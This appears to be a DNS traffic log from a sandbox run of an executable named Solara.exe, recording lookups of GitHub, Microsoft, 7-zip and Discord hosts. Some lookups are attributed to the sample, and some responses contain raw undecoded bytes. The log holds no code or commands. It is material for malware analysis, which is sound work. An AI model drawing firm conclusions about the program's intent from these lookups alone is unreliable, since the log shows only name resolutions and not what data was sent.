Remote address:

8.8.8.8:53

Request

business.bing.com

IN Unknown

Response

business.bing.com

IN CNAME

business-bing-com.b-0005.b-msedge.net
DNS

bzib.nelreports.net

Remote address:

8.8.8.8:53

Request

bzib.nelreports.net

IN A

Response

bzib.nelreports.net

IN CNAME

bzib.nelreports.net.akamaized.net

bzib.nelreports.net.akamaized.net

IN CNAME

a416.dscd.akamai.net

a416.dscd.akamai.net

IN A

88.221.134.17

a416.dscd.akamai.net

IN A

88.221.135.81
DNS

bzib.nelreports.net

Remote address:

8.8.8.8:53

Request

bzib.nelreports.net

IN Unknown

Response

bzib.nelreports.net

IN CNAME

bzib.nelreports.net.akamaized.net

bzib.nelreports.net.akamaized.net

IN CNAME

a416.dscd.akamai.net
DNS

8.8.8.8.in-addr.arpa

Remote address:

8.8.8.8:53

Request

8.8.8.8.in-addr.arpa

IN PTR

Response

8.8.8.8.in-addr.arpa

IN PTR

dnsgoogle
DNS

215.156.26.20.in-addr.arpa

Remote address:

8.8.8.8:53

Request

215.156.26.20.in-addr.arpa

IN PTR

Response
DNS

17.160.190.20.in-addr.arpa

Remote address:

8.8.8.8:53

Request

17.160.190.20.in-addr.arpa

IN PTR

Response
DNS

241.150.49.20.in-addr.arpa

Remote address:

8.8.8.8:53

Request

241.150.49.20.in-addr.arpa

IN PTR

Response
DNS

github.githubassets.com

Remote address:

8.8.8.8:53

Request

github.githubassets.com

IN A

Response

github.githubassets.com

IN A

185.199.109.154

github.githubassets.com

IN A

185.199.108.154

github.githubassets.com

IN A

185.199.111.154

github.githubassets.com

IN A

185.199.110.154
DNS

github.githubassets.com

Remote address:

8.8.8.8:53

Request

github.githubassets.com

IN Unknown

Response
DNS

avatars.githubusercontent.com

Remote address:

8.8.8.8:53

Request

avatars.githubusercontent.com

IN A

Response

avatars.githubusercontent.com

IN A

185.199.111.133

avatars.githubusercontent.com

IN A

185.199.109.133

avatars.githubusercontent.com

IN A

185.199.110.133

avatars.githubusercontent.com

IN A

185.199.108.133
DNS

avatars.githubusercontent.com

Remote address:

8.8.8.8:53

Request

avatars.githubusercontent.com

IN Unknown

Response
DNS

user-images.githubusercontent.com

Remote address:

8.8.8.8:53

Request

user-images.githubusercontent.com

IN A

Response

user-images.githubusercontent.com

IN A

185.199.111.133

user-images.githubusercontent.com

IN A

185.199.110.133

user-images.githubusercontent.com

IN A

185.199.108.133

user-images.githubusercontent.com

IN A

185.199.109.133
DNS

user-images.githubusercontent.com

Remote address:

8.8.8.8:53

Request

user-images.githubusercontent.com

IN Unknown

Response
DNS

github-cloud.s3.amazonaws.com

Remote address:

8.8.8.8:53

Request

github-cloud.s3.amazonaws.com

IN A

Response

github-cloud.s3.amazonaws.com

IN CNAME

s3-1-w.amazonaws.com

s3-1-w.amazonaws.com

IN CNAME

s3-w.us-east-1.amazonaws.com

s3-w.us-east-1.amazonaws.com

IN A

16.182.70.233

s3-w.us-east-1.amazonaws.com

IN A

52.216.42.129

s3-w.us-east-1.amazonaws.com

IN A

3.5.9.154

s3-w.us-east-1.amazonaws.com

IN A

3.5.20.102

s3-w.us-east-1.amazonaws.com

IN A

16.182.41.49

s3-w.us-east-1.amazonaws.com

IN A

3.5.25.213

s3-w.us-east-1.amazonaws.com

IN A

52.217.130.25

s3-w.us-east-1.amazonaws.com

IN A

16.182.108.209
DNS

github-cloud.s3.amazonaws.com

Remote address:

8.8.8.8:53

Request

github-cloud.s3.amazonaws.com

IN Unknown

Response

github-cloud.s3.amazonaws.com

IN CNAME

s3-1-w.amazonaws.com

s3-1-w.amazonaws.com

IN CNAME

s3-w.us-east-1.amazonaws.com
DNS

nav-edge.smartscreen.microsoft.com

Remote address:

8.8.8.8:53

Request

nav-edge.smartscreen.microsoft.com

IN A

Response

nav-edge.smartscreen.microsoft.com

IN CNAME

prod-atm-wds-edge.trafficmanager.net

prod-atm-wds-edge.trafficmanager.net

IN CNAME

prod-agic-us-3.uksouth.cloudapp.azure.com

prod-agic-us-3.uksouth.cloudapp.azure.com

IN A

172.165.61.93
DNS

nav-edge.smartscreen.microsoft.com

Remote address:

8.8.8.8:53

Request

nav-edge.smartscreen.microsoft.com

IN Unknown

Response

nav-edge.smartscreen.microsoft.com

IN CNAME

prod-atm-wds-edge.trafficmanager.net

prod-atm-wds-edge.trafficmanager.net

IN CNAME

prod-agic-us-1.uksouth.cloudapp.azure.com
DNS

17.134.221.88.in-addr.arpa

Remote address:

8.8.8.8:53

Request

17.134.221.88.in-addr.arpa

IN PTR

Response

17.134.221.88.in-addr.arpa

IN PTR

a88-221-134-17deploystaticakamaitechnologiescom
DNS

95.221.229.192.in-addr.arpa

Remote address:

8.8.8.8:53

Request

95.221.229.192.in-addr.arpa

IN PTR

Response
DNS

133.111.199.185.in-addr.arpa

Remote address:

8.8.8.8:53

Request

133.111.199.185.in-addr.arpa

IN PTR

Response

133.111.199.185.in-addr.arpa

IN PTR

cdn-185-199-111-133githubcom
DNS

154.109.199.185.in-addr.arpa

Remote address:

8.8.8.8:53

Request

154.109.199.185.in-addr.arpa

IN PTR

Response

154.109.199.185.in-addr.arpa

IN PTR

cdn-185-199-109-154githubcom
DNS

93.61.165.172.in-addr.arpa

Remote address:

8.8.8.8:53

Request

93.61.165.172.in-addr.arpa

IN PTR

Response
DNS

27.135.221.88.in-addr.arpa

Remote address:

8.8.8.8:53

Request

27.135.221.88.in-addr.arpa

IN PTR

Response

27.135.221.88.in-addr.arpa

IN PTR

a88-221-135-27deploystaticakamaitechnologiescom
DNS

collector.github.com

Remote address:

8.8.8.8:53

Request

collector.github.com

IN A

Response

collector.github.com

IN CNAME

glb-db52c2cf8be544.github.com

glb-db52c2cf8be544.github.com

IN A

140.82.112.22
DNS

collector.github.com

Remote address:

8.8.8.8:53

Request

collector.github.com

IN Unknown

Response

collector.github.com

IN CNAME

glb-db52c2cf8be544.github.com
DNS

22.112.82.140.in-addr.arpa

Remote address:

8.8.8.8:53

Request

22.112.82.140.in-addr.arpa

IN PTR

Response

22.112.82.140.in-addr.arpa

IN PTR

lb-140-82-112-22-iadgithubcom
DNS

api.github.com

Remote address:

8.8.8.8:53

Request

api.github.com

IN A

Response

api.github.com

IN A

20.26.156.210
DNS

api.github.com

Remote address:

8.8.8.8:53

Request

api.github.com

IN Unknown

Response
DNS

210.156.26.20.in-addr.arpa

Remote address:

8.8.8.8:53

Request

210.156.26.20.in-addr.arpa

IN PTR

Response
DNS

github.com

Remote address:

8.8.8.8:53

Request

github.com

IN A

Response

github.com

IN A

20.26.156.215
DNS

github.com

Remote address:

8.8.8.8:53

Request

github.com

IN A

Response

github.com

IN A

20.26.156.215
DNS

objects.githubusercontent.com

Remote address:

8.8.8.8:53

Request

objects.githubusercontent.com

IN A

Response

objects.githubusercontent.com

IN A

185.199.109.133

objects.githubusercontent.com

IN A

185.199.110.133

objects.githubusercontent.com

IN A

185.199.111.133

objects.githubusercontent.com

IN A

185.199.108.133
DNS

objects.githubusercontent.com

Remote address:

8.8.8.8:53

Request

objects.githubusercontent.com

IN A

Response

objects.githubusercontent.com

IN A

185.199.109.133

objects.githubusercontent.com

IN A

185.199.110.133

objects.githubusercontent.com

IN A

185.199.111.133

objects.githubusercontent.com

IN A

185.199.108.133
DNS

objects.githubusercontent.com

Remote address:

8.8.8.8:53

Request

objects.githubusercontent.com

IN Unknown

Response
DNS

dl-edge.smartscreen.microsoft.com

Remote address:

8.8.8.8:53

Request

dl-edge.smartscreen.microsoft.com

IN A

Response

dl-edge.smartscreen.microsoft.com

IN CNAME

prod-atm-wds-edge.trafficmanager.net

prod-atm-wds-edge.trafficmanager.net

IN CNAME

prod-agic-us-2.uksouth.cloudapp.azure.com

prod-agic-us-2.uksouth.cloudapp.azure.com

IN A

172.165.69.228
DNS

dl-edge.smartscreen.microsoft.com

Remote address:

8.8.8.8:53

Request

dl-edge.smartscreen.microsoft.com

IN Unknown

Response

dl-edge.smartscreen.microsoft.com

IN CNAME

prod-atm-wds-edge.trafficmanager.net

prod-atm-wds-edge.trafficmanager.net

IN CNAME

prod-agic-us-2.uksouth.cloudapp.azure.com
DNS

133.109.199.185.in-addr.arpa

Remote address:

8.8.8.8:53

Request

133.109.199.185.in-addr.arpa

IN PTR

Response

133.109.199.185.in-addr.arpa

IN PTR

cdn-185-199-109-133githubcom
DNS

app-edge.smartscreen.microsoft.com

Remote address:

8.8.8.8:53

Request

app-edge.smartscreen.microsoft.com

IN A

Response

app-edge.smartscreen.microsoft.com

IN CNAME

prod-atm-wds-apprep.trafficmanager.net

prod-atm-wds-apprep.trafficmanager.net

IN CNAME

prod-agic-us-1.uksouth.cloudapp.azure.com

prod-agic-us-1.uksouth.cloudapp.azure.com

IN A

13.87.96.169
DNS

app-edge.smartscreen.microsoft.com

Remote address:

8.8.8.8:53

Request

app-edge.smartscreen.microsoft.com

IN Unknown

Response

app-edge.smartscreen.microsoft.com

IN CNAME

prod-atm-wds-apprep.trafficmanager.net

prod-atm-wds-apprep.trafficmanager.net

IN CNAME

prod-agic-us-2.uksouth.cloudapp.azure.com
DNS

169.96.87.13.in-addr.arpa

Remote address:

8.8.8.8:53

Request

169.96.87.13.in-addr.arpa

IN PTR

Response
DNS

28.118.140.52.in-addr.arpa

Remote address:

8.8.8.8:53

Request

28.118.140.52.in-addr.arpa

IN PTR

Response
DNS

telem-edge.smartscreen.microsoft.com

Remote address:

8.8.8.8:53

Request

telem-edge.smartscreen.microsoft.com

IN A

Response

telem-edge.smartscreen.microsoft.com

IN CNAME

prod-atm-wds-edge.trafficmanager.net

prod-atm-wds-edge.trafficmanager.net

IN CNAME

prod-agic-uw-2.ukwest.cloudapp.azure.com

prod-agic-uw-2.ukwest.cloudapp.azure.com

IN A

51.140.244.186
DNS

telem-edge.smartscreen.microsoft.com

Remote address:

8.8.8.8:53

Request

telem-edge.smartscreen.microsoft.com

IN Unknown

Response

telem-edge.smartscreen.microsoft.com

IN CNAME

prod-atm-wds-edge.trafficmanager.net

prod-atm-wds-edge.trafficmanager.net

IN CNAME

prod-agic-us-2.uksouth.cloudapp.azure.com
DNS

r.bing.com

Remote address:

8.8.8.8:53

Request

r.bing.com

IN A

Response

r.bing.com

IN CNAME

p-static.bing.trafficmanager.net

p-static.bing.trafficmanager.net

IN CNAME

r.bing.com.edgekey.net

r.bing.com.edgekey.net

IN CNAME

e86303.dscx.akamaiedge.net

e86303.dscx.akamaiedge.net

IN A

88.221.135.42

e86303.dscx.akamaiedge.net

IN A

88.221.135.11

e86303.dscx.akamaiedge.net

IN A

88.221.135.33

e86303.dscx.akamaiedge.net

IN A

88.221.135.25

e86303.dscx.akamaiedge.net

IN A

88.221.135.27

e86303.dscx.akamaiedge.net

IN A

95.101.143.202
DNS

r.bing.com

Remote address:

8.8.8.8:53

Request

r.bing.com

IN Unknown

Response

r.bing.com

IN CNAME

p-static.bing.trafficmanager.net

p-static.bing.trafficmanager.net

IN CNAME

r.bing.com.edgekey.net

r.bing.com.edgekey.net

IN CNAME

e86303.dscx.akamaiedge.net
DNS

th.bing.com

Remote address:

8.8.8.8:53

Request

th.bing.com

IN A

Response

th.bing.com

IN CNAME

p-th.bing.com.trafficmanager.net

p-th.bing.com.trafficmanager.net

IN CNAME

th.bing.com.edgekey.net

th.bing.com.edgekey.net

IN CNAME

e86303.dscx.akamaiedge.net

e86303.dscx.akamaiedge.net

IN A

88.221.135.27

e86303.dscx.akamaiedge.net

IN A

88.221.135.25

e86303.dscx.akamaiedge.net

IN A

95.101.143.201

e86303.dscx.akamaiedge.net

IN A

88.221.135.42

e86303.dscx.akamaiedge.net

IN A

88.221.135.34

e86303.dscx.akamaiedge.net

IN A

88.221.135.33

e86303.dscx.akamaiedge.net

IN A

95.101.143.219
DNS

th.bing.com

Remote address:

8.8.8.8:53

Request

th.bing.com

IN Unknown

Response

th.bing.com

IN CNAME

p-th.bing.com.trafficmanager.net

p-th.bing.com.trafficmanager.net

IN CNAME

th.bing.com.edgekey.net

th.bing.com.edgekey.net

IN CNAME

e86303.dscx.akamaiedge.net
DNS

186.244.140.51.in-addr.arpa

Remote address:

8.8.8.8:53

Request

186.244.140.51.in-addr.arpa

IN PTR

Response
DNS

login.microsoftonline.com

Remote address:

8.8.8.8:53

Request

login.microsoftonline.com

IN A

Response

login.microsoftonline.com

IN CNAME

login.mso.msidentity.com

login.mso.msidentity.com

IN CNAME

ak.privatelink.msidentity.com

ak.privatelink.msidentity.com

IN CNAME

www.tm.ak.prd.aadg.trafficmanager.net

www.tm.ak.prd.aadg.trafficmanager.net

IN A

20.190.159.64

www.tm.ak.prd.aadg.trafficmanager.net

IN A

20.190.159.0

www.tm.ak.prd.aadg.trafficmanager.net

IN A

40.126.31.73

www.tm.ak.prd.aadg.trafficmanager.net

IN A

20.190.159.2

www.tm.ak.prd.aadg.trafficmanager.net

IN A

40.126.31.71

www.tm.ak.prd.aadg.trafficmanager.net

IN A

20.190.159.4

www.tm.ak.prd.aadg.trafficmanager.net

IN A

20.190.159.75

www.tm.ak.prd.aadg.trafficmanager.net

IN A

20.190.159.68
DNS

login.microsoftonline.com

Remote address:

8.8.8.8:53

Request

login.microsoftonline.com

IN Unknown

Response

login.microsoftonline.com

IN CNAME

login.mso.msidentity.com

login.mso.msidentity.com

IN CNAME

ak.privatelink.msidentity.com

ak.privatelink.msidentity.com

IN CNAME

www.tm.ak.prd.aadg.trafficmanager.net
DNS

login.microsoftonline.com

Remote address:

8.8.8.8:53

Request

login.microsoftonline.com

IN A

Response

login.microsoftonline.com

IN CNAME

login.mso.msidentity.com

login.mso.msidentity.com

IN CNAME

ak.privatelink.msidentity.com

ak.privatelink.msidentity.com

IN CNAME

www.tm.ak.prd.aadg.akadns.net

www.tm.ak.prd.aadg.akadns.net

IN A

40.126.32.140

www.tm.ak.prd.aadg.akadns.net

IN A

40.126.32.72

www.tm.ak.prd.aadg.akadns.net

IN A

40.126.32.74

www.tm.ak.prd.aadg.akadns.net

IN A

20.190.160.20

www.tm.ak.prd.aadg.akadns.net

IN A

20.190.160.14

www.tm.ak.prd.aadg.akadns.net

IN A

20.190.160.17

www.tm.ak.prd.aadg.akadns.net

IN A

20.190.160.22

www.tm.ak.prd.aadg.akadns.net

IN A

40.126.32.138
DNS

42.135.221.88.in-addr.arpa

Remote address:

8.8.8.8:53

Request

42.135.221.88.in-addr.arpa

IN PTR

Response

42.135.221.88.in-addr.arpa

IN PTR

a88-221-135-42deploystaticakamaitechnologiescom
DNS

64.159.190.20.in-addr.arpa

Remote address:

8.8.8.8:53

Request

64.159.190.20.in-addr.arpa

IN PTR

Response
DNS

login.microsoftonline.com

Remote address:

8.8.8.8:53

Request

login.microsoftonline.com

IN A

Response

login.microsoftonline.com

IN CNAME

login.mso.msidentity.com

login.mso.msidentity.com

IN CNAME

ak.privatelink.msidentity.com

ak.privatelink.msidentity.com

IN CNAME

www.tm.ak.prd.aadg.trafficmanager.net

www.tm.ak.prd.aadg.trafficmanager.net

IN A

20.190.159.2

www.tm.ak.prd.aadg.trafficmanager.net

IN A

40.126.31.67

www.tm.ak.prd.aadg.trafficmanager.net

IN A

20.190.159.4

www.tm.ak.prd.aadg.trafficmanager.net

IN A

20.190.159.73

www.tm.ak.prd.aadg.trafficmanager.net

IN A

20.190.159.75

www.tm.ak.prd.aadg.trafficmanager.net

IN A

20.190.159.0

www.tm.ak.prd.aadg.trafficmanager.net

IN A

20.190.159.64

www.tm.ak.prd.aadg.trafficmanager.net

IN A

20.190.159.68
DNS

services.bingapis.com

Remote address:

8.8.8.8:53

Request

services.bingapis.com

IN A

Response

services.bingapis.com

IN CNAME

services-bingapis-com.e-0001.e-msedge.net

services-bingapis-com.e-0001.e-msedge.net

IN CNAME

e-0001.e-msedge.net

e-0001.e-msedge.net

IN A

13.107.5.80
DNS

services.bingapis.com

Remote address:

8.8.8.8:53

Request

services.bingapis.com

IN Unknown

Response

services.bingapis.com

IN CNAME

services-bingapis-com.e-0001.e-msedge.net

services-bingapis-com.e-0001.e-msedge.net

IN CNAME

e-0001.e-msedge.net
DNS

80.5.107.13.in-addr.arpa

Remote address:

8.8.8.8:53

Request

80.5.107.13.in-addr.arpa

IN PTR

Response
DNS

72.32.126.40.in-addr.arpa

Remote address:

8.8.8.8:53

Request

72.32.126.40.in-addr.arpa

IN PTR

Response
DNS

www.7-zip.org

Remote address:

8.8.8.8:53

Request

www.7-zip.org

IN A

Response

www.7-zip.org

IN A

49.12.202.237
DNS

www.7-zip.org

Remote address:

8.8.8.8:53

Request

www.7-zip.org

IN Unknown

Response
DNS

www.7-zip.org

Remote address:

8.8.8.8:53

Request

www.7-zip.org

IN A

Response

www.7-zip.org

IN A

49.12.202.237
DNS

200.197.79.204.in-addr.arpa

Remote address:

8.8.8.8:53

Request

200.197.79.204.in-addr.arpa

IN PTR

Response

200.197.79.204.in-addr.arpa

IN PTR

a-0001a-msedgenet
DNS

237.202.12.49.in-addr.arpa

Remote address:

8.8.8.8:53

Request

237.202.12.49.in-addr.arpa

IN PTR

Response

237.202.12.49.in-addr.arpa

IN PTR

static2372021249clientsyour-serverde
DNS

www.7-zip.org

Remote address:

8.8.8.8:53

Request

www.7-zip.org

IN A

Response

www.7-zip.org

IN A

49.12.202.237
DNS

www.7-zip.org

Remote address:

8.8.8.8:53

Request

www.7-zip.org

IN A

Response

www.7-zip.org

IN A

49.12.202.237
DNS

github.com

Remote address:

8.8.8.8:53

Request

github.com

IN A

Response

github.com

IN A

20.26.156.215
DNS

objects.githubusercontent.com

Remote address:

8.8.8.8:53

Request

objects.githubusercontent.com

IN A

Response

objects.githubusercontent.com

IN A

185.199.110.133

objects.githubusercontent.com

IN A

185.199.109.133

objects.githubusercontent.com

IN A

185.199.111.133

objects.githubusercontent.com

IN A

185.199.108.133
DNS

26.165.165.52.in-addr.arpa

Remote address:

8.8.8.8:53

Request

26.165.165.52.in-addr.arpa

IN PTR

Response
DNS

198.187.3.20.in-addr.arpa

Remote address:

8.8.8.8:53

Request

198.187.3.20.in-addr.arpa

IN PTR

Response
DNS

217.135.221.88.in-addr.arpa

Remote address:

8.8.8.8:53

Request

217.135.221.88.in-addr.arpa

IN PTR

Response

217.135.221.88.in-addr.arpa

IN PTR

a88-221-135-217deploystaticakamaitechnologiescom
DNS

discord.com

Solara.exe

Remote address:

8.8.8.8:53

Request

discord.com

IN A

Response

discord.com

IN A

162.159.135.232

discord.com

IN A

162.159.138.232

discord.com

IN A

162.159.128.233

discord.com

IN A

162.159.137.232

discord.com

IN A

162.159.136.232
DNS

discord.com

Solara.exe

Remote address:

8.8.8.8:53

Request

discord.com

IN Unknown

Response

discord.com

IN Unknown

h3h2��颟�袟�袟�袟��
DNS

discord.com

Solara.exe

Remote address:

8.8.8.8:53

Request

discord.com

IN A

Response

discord.com

IN A

162.159.137.232

discord.com

IN A

162.159.138.232

discord.com

IN A

162.159.128.233

discord.com

IN A

162.159.135.232

discord.com

IN A

162.159.136.232
DNS

cdn.prod.website-files.com

Remote address:

8.8.8.8:53

Request

cdn.prod.website-files.com

IN A

Response

cdn.prod.website-files.com

IN A

104.18.160.117

cdn.prod.website-files.com

IN A

104.18.161.117
DNS

cdn.prod.website-files.com

Remote address:

8.8.8.8:53

Request

cdn.prod.website-files.com

IN Unknown

Response

cdn.prod.website-files.com

IN Unknown

h3h2h�uh�u &Gh�u&Gh�u
DNS

ajax.googleapis.com

Remote address:

8.8.8.8:53

Request

ajax.googleapis.com

IN A

Response

ajax.googleapis.com

IN A

142.250.180.10
DNS

ajax.googleapis.com

Remote address:

8.8.8.8:53

Request

ajax.googleapis.com

IN Unknown

Response
DNS

cdn.localizeapi.com

Remote address:

8.8.8.8:53

Request

cdn.localizeapi.com

IN A

Response

cdn.localizeapi.com

IN A

104.22.20.64

cdn.localizeapi.com

IN A

172.67.41.53

cdn.localizeapi.com

IN A

104.22.21.64
DNS

cdn.localizeapi.com

Remote address:

8.8.8.8:53

Request

cdn.localizeapi.com

IN Unknown

Response

cdn.localizeapi.com

IN Unknown

h3h2h@h@�C)50&Gh@&Gh@&G�C)5
DNS

232.135.159.162.in-addr.arpa

Remote address:

8.8.8.8:53

Request

232.135.159.162.in-addr.arpa

IN PTR

Response
DNS

117.160.18.104.in-addr.arpa

Remote address:

8.8.8.8:53

Request

117.160.18.104.in-addr.arpa

IN PTR

Response
DNS

64.20.22.104.in-addr.arpa

Remote address:

8.8.8.8:53

Request

64.20.22.104.in-addr.arpa

IN PTR

Response
DNS

3.200.250.142.in-addr.arpa

Remote address:

8.8.8.8:53

Request

3.200.250.142.in-addr.arpa

IN PTR

Response

3.200.250.142.in-addr.arpa

IN PTR

lhr48s29-in-f31e100net
DNS

10.180.250.142.in-addr.arpa

Remote address:

8.8.8.8:53

Request

10.180.250.142.in-addr.arpa

IN PTR

Response

10.180.250.142.in-addr.arpa

IN PTR

lhr25s32-in-f101e100net
DNS

d3e54v103j8qbb.cloudfront.net

Remote address:

8.8.8.8:53

Request

d3e54v103j8qbb.cloudfront.net

IN A

Response

d3e54v103j8qbb.cloudfront.net

IN A

18.245.246.158

d3e54v103j8qbb.cloudfront.net

IN A

18.245.246.114

d3e54v103j8qbb.cloudfront.net

IN A

18.245.246.167

d3e54v103j8qbb.cloudfront.net

IN A

18.245.246.151
DNS

d3e54v103j8qbb.cloudfront.net

Remote address:

8.8.8.8:53

Request

d3e54v103j8qbb.cloudfront.net

IN Unknown

Response
DNS

cdn.discordapp.com

Remote address:

8.8.8.8:53

Request

cdn.discordapp.com

IN A

Response

cdn.discordapp.com

IN A

162.159.133.233

cdn.discordapp.com

IN A

162.159.130.233

cdn.discordapp.com

IN A

162.159.135.233

cdn.discordapp.com

IN A

162.159.134.233

cdn.discordapp.com

IN A

162.159.129.233
DNS

cdn.discordapp.com

Remote address:

8.8.8.8:53

Request

cdn.discordapp.com

IN Unknown

Response

cdn.discordapp.com

IN Unknown

h3h2��颟�颟�颟�颟��
DNS

158.246.245.18.in-addr.arpa

Remote address:

8.8.8.8:53

Request

158.246.245.18.in-addr.arpa

IN PTR

Response

158.246.245.18.in-addr.arpa

IN PTR

server-18-245-246-158lhr5r cloudfrontnet
DNS

233.133.159.162.in-addr.arpa

Remote address:

8.8.8.8:53

Request

233.133.159.162.in-addr.arpa

IN PTR

Response
DNS

240.221.184.93.in-addr.arpa

Remote address:

8.8.8.8:53

Request

240.221.184.93.in-addr.arpa

IN PTR

Response
DNS

geolocation.onetrust.com

Remote address:

8.8.8.8:53

Request

geolocation.onetrust.com

IN A

Response

geolocation.onetrust.com

IN A

172.64.155.119

geolocation.onetrust.com

IN A

104.18.32.137
DNS

geolocation.onetrust.com

Remote address:

8.8.8.8:53

Request

geolocation.onetrust.com

IN Unknown

Response

geolocation.onetrust.com

IN Unknown

h2h ��@�w &GDh �&GD�@�w
DNS

232.187.250.142.in-addr.arpa

Remote address:

8.8.8.8:53

Request

232.187.250.142.in-addr.arpa

IN PTR

Response

232.187.250.142.in-addr.arpa

IN PTR

lhr25s34-in-f81e100net
DNS

119.155.64.172.in-addr.arpa

Remote address:

8.8.8.8:53

Request

119.155.64.172.in-addr.arpa

IN PTR

Response
DNS

discord.com

Solara.exe

Remote address:

8.8.8.8:53

Request

discord.com

IN A

Response

discord.com

IN A

162.159.137.232

discord.com

IN A

162.159.135.232

discord.com

IN A

162.159.136.232

discord.com

IN A

162.159.138.232

discord.com

IN A

162.159.128.233
DNS

discord.com

Solara.exe

Remote address:

8.8.8.8:53

Request

discord.com

IN A

Response

discord.com

IN A

162.159.135.232

discord.com

IN A

162.159.136.232

discord.com

IN A

162.159.128.233

discord.com

IN A

162.159.137.232

discord.com

IN A

162.159.138.232
DNS

remote-auth-gateway.discord.gg

Remote address:

8.8.8.8:53

Request

remote-auth-gateway.discord.gg

IN A

Response

remote-auth-gateway.discord.gg

IN A

162.159.135.234

remote-auth-gateway.discord.gg

IN A

162.159.134.234

remote-auth-gateway.discord.gg

IN A

162.159.133.234

remote-auth-gateway.discord.gg

IN A

162.159.136.234

remote-auth-gateway.discord.gg

IN A

162.159.130.234
DNS

remote-auth-gateway.discord.gg

Remote address:

8.8.8.8:53

Request

remote-auth-gateway.discord.gg

IN Unknown

Response

remote-auth-gateway.discord.gg

IN Unknown

h2��ꢟ�ꢟ�ꢟ�ꢟ��
DNS

234.135.159.162.in-addr.arpa

Remote address:

8.8.8.8:53

Request

234.135.159.162.in-addr.arpa

IN PTR

Response
DNS

js.hcaptcha.com

Remote address:

8.8.8.8:53

Request

js.hcaptcha.com

IN A

Response

js.hcaptcha.com

IN A

104.19.230.21

js.hcaptcha.com

IN A

104.19.229.21
DNS

js.hcaptcha.com

Remote address:

8.8.8.8:53

Request

js.hcaptcha.com

IN Unknown

Response

js.hcaptcha.com

IN Unknown

h3h2h�h�
DNS

21.230.19.104.in-addr.arpa

Remote address:

8.8.8.8:53

Request

21.230.19.104.in-addr.arpa

IN PTR

Response
DNS

newassets.hcaptcha.com

Remote address:

8.8.8.8:53

Request

newassets.hcaptcha.com

IN A

Response

newassets.hcaptcha.com

IN A

104.19.230.21

newassets.hcaptcha.com

IN A

104.19.229.21
DNS

newassets.hcaptcha.com

Remote address:

8.8.8.8:53

Request

newassets.hcaptcha.com

IN Unknown

Response

newassets.hcaptcha.com

IN Unknown

h3h2h�h�
DNS

newassets.hcaptcha.com

Remote address:

8.8.8.8:53

Request

newassets.hcaptcha.com

IN A

Response

newassets.hcaptcha.com

IN A

104.19.230.21

newassets.hcaptcha.com

IN A

104.19.229.21
DNS

discord.com

Solara.exe

Remote address:

8.8.8.8:53

Request

discord.com

IN A

Response

discord.com

IN A

162.159.136.232

discord.com

IN A

162.159.128.233

discord.com

IN A

162.159.137.232

discord.com

IN A

162.159.138.232

discord.com

IN A

162.159.135.232
DNS

newassets.hcaptcha.com

Remote address:

8.8.8.8:53

Request

newassets.hcaptcha.com

IN A

Response

newassets.hcaptcha.com

IN A

104.19.229.21

newassets.hcaptcha.com

IN A

104.19.230.21
DNS

discord.com

Solara.exe

Remote address:

8.8.8.8:53

Request

discord.com

IN A

Response

discord.com

IN A

162.159.136.232

discord.com

IN A

162.159.137.232

discord.com

IN A

162.159.138.232

discord.com

IN A

162.159.128.233

discord.com

IN A

162.159.135.232
DNS

api.hcaptcha.com

Remote address:

8.8.8.8:53

Request

api.hcaptcha.com

IN A

Response

api.hcaptcha.com

IN A

104.19.229.21

api.hcaptcha.com

IN A

104.19.230.21
DNS

api.hcaptcha.com

Remote address:

8.8.8.8:53

Request

api.hcaptcha.com

IN Unknown

Response

api.hcaptcha.com

IN Unknown

h3h2h�h�
DNS

stun.l.google.com

Remote address:

8.8.8.8:53

Request

stun.l.google.com

IN A

Response

stun.l.google.com

IN A

74.125.250.129
DNS

stun.l.google.com

Remote address:

8.8.8.8:53

Request

stun.l.google.com

IN AAAA

Response

stun.l.google.com

IN AAAA

2001:4860:4864:5:8000::1
DNS

stun.l.google.com

Remote address:

8.8.8.8:53

Request

stun.l.google.com

IN AAAA

Response

stun.l.google.com

IN AAAA

2001:4860:4864:5:8000::1
DNS

129.250.125.74.in-addr.arpa

Remote address:

8.8.8.8:53

Request

129.250.125.74.in-addr.arpa

IN PTR

Response
DNS

21.229.19.104.in-addr.arpa

Remote address:

8.8.8.8:53

Request

21.229.19.104.in-addr.arpa

IN PTR

Response
DNS

gateway.discord.gg

Remote address:

8.8.8.8:53

Request

gateway.discord.gg

IN A

Response

gateway.discord.gg

IN A

162.159.136.234

gateway.discord.gg

IN A

162.159.133.234

gateway.discord.gg

IN A

162.159.134.234

gateway.discord.gg

IN A

162.159.135.234

gateway.discord.gg

IN A

162.159.130.234
DNS

gateway.discord.gg

Remote address:

8.8.8.8:53

Request

gateway.discord.gg

IN Unknown

Response

gateway.discord.gg

IN Unknown

h2��ꢟ�ꢟ�ꢟ�ꢟ��
DNS

234.136.159.162.in-addr.arpa

Remote address:

8.8.8.8:53

Request

234.136.159.162.in-addr.arpa

IN PTR

Response
DNS

status.discord.com

Remote address:

8.8.8.8:53

Request

status.discord.com

IN A

Response

status.discord.com

IN A

162.159.135.232

status.discord.com

IN A

162.159.137.232

status.discord.com

IN A

162.159.128.233

status.discord.com

IN A

162.159.138.232

status.discord.com

IN A

162.159.136.232
DNS

status.discord.com

Remote address:

8.8.8.8:53

Request

status.discord.com

IN Unknown

Response

status.discord.com

IN Unknown

h3h2��颟�袟�袟�袟��
DNS

media.discordapp.net

Remote address:

8.8.8.8:53

Request

media.discordapp.net

IN A

Response

media.discordapp.net

IN A

162.159.128.232

media.discordapp.net

IN A

162.159.129.232

media.discordapp.net

IN A

162.159.133.232

media.discordapp.net

IN A

162.159.134.232

media.discordapp.net

IN A

162.159.130.232
DNS

media.discordapp.net

Remote address:

8.8.8.8:53

Request

media.discordapp.net

IN Unknown

Response

media.discordapp.net

IN Unknown

h3h2��袟�袟�袟�袟��
DNS

232.128.159.162.in-addr.arpa

Remote address:

8.8.8.8:53

Request

232.128.159.162.in-addr.arpa

IN PTR

Response
DNS

90.65.42.20.in-addr.arpa

Remote address:

8.8.8.8:53

Request

90.65.42.20.in-addr.arpa

IN PTR

Response
DNS

a.nel.cloudflare.com

Remote address:

8.8.8.8:53

Request

a.nel.cloudflare.com

IN A

Response

a.nel.cloudflare.com

IN A

35.190.80.1
DNS

a.nel.cloudflare.com

Remote address:

8.8.8.8:53

Request

a.nel.cloudflare.com

IN Unknown

Response
DNS

1.80.190.35.in-addr.arpa

Remote address:

8.8.8.8:53

Request

1.80.190.35.in-addr.arpa

IN PTR

Response

1.80.190.35.in-addr.arpa

IN PTR

18019035bcgoogleusercontentcom
DNS

discord.com

Solara.exe

Remote address:

8.8.8.8:53

Request

discord.com

IN A

Response

discord.com

IN A

162.159.137.232

discord.com

IN A

162.159.128.233

